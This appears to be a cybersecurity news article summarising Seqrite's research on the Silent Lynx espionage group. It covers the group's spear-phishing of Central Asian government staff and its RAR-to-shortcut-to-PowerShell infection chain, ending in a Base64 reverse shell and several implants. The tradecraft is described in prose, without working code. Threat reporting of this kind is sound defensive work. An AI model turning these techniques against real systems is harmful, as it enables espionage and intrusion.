Silent Lynx APT New Attack Targeting Governmental Employees Posing as Officials

Silent Lynx, a sophisticated threat group that has been tracked since 2024, continues its relentless espionage campaign against government entities across Central Asia.

Seqrite analysts identified the group as the first to assign this nomenclature, distinguishing it from multiple overlapping aliases including YoroTrooper, Sturgeon Phisher, and ShadowSilk.

The group has become notorious for orchestrating spear-phishing campaigns while impersonating government officials, specifically targeting governmental employees with malicious attachments designed to harvest sensitive information.

The threat group primarily leverages fabricated summit-related communications to distribute its weaponized payload.

Seqrite researchers noted that Silent Lynx demonstrates a pattern of hastily constructed campaigns targeting diplomatic entities involved in high-level international meetings.

The group’s operations extend across multiple Central Asian nations including Tajikistan, Azerbaijan, Russia, and China, with strategic focus on nations involved in cross-border infrastructure projects and diplomatic initiatives.

Seqrite analysts identified two distinct campaigns in 2025, both employing similar attack methodologies but targeting different geopolitical relationships.

The first campaign, discovered in October 2025, targeted diplomatic entities involved in Russia-Azerbaijan summit preparations, while the second focused on entities associated with China-Central Asian relations.

The timing and thematic consistency of these campaigns reveal a coordinated espionage operation driven by geopolitical interests rather than financial gain.

Infection Mechanism and Technical Arsenal

The infection chain begins with a deceptive RAR archive bearing benign filenames like “План развитие стратегического сотрудничества.pdf.rar” (Plan for Development of Strategic Cooperation).

When extracted, the archive reveals a malicious Windows shortcut file that abuses PowerShell.exe to download and execute obfuscated scripts from GitHub repositories.

The LNK file contains working directory metadata pointing to C:\Users\GoBus\OneDrive\Рабочий стол, serving as a pivot point for tracking additional campaigns.

The downloaded PowerShell script contains Base64-encoded reverse shell code that connects to remote command-and-control servers on port 443.

The decoded payload establishes a persistent TCP connection where it reads commands from operators, executes them via Invoke-Expression, and returns output across the same channel.

Seqrite researchers identified three primary implants deployed in these campaigns: Silent Loader (a C++ based downloader), Laplas (a TCP and TLS-based reverse shell), and SilentSweeper (a .NET implant capable of extracting and executing embedded PowerShell scripts).

The SilentSweeper implant accepts multiple arguments including -extract for writing embedded malicious PowerShell to disk and -debug for troubleshooting.

It reads a file named qw.ps1 from its Resources section, executes the contents, and downloads additional reverse shell payloads.

Beyond remote access, Seqrite analysts observed deployment of Ligolo-ng, an open-source tunneling tool, providing operators unrestricted command execution capabilities on compromised systems.

The multi-stage infection mechanism demonstrates sophisticated operational security awareness despite numerous OPSEC blunders that facilitated attribution and tracking.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.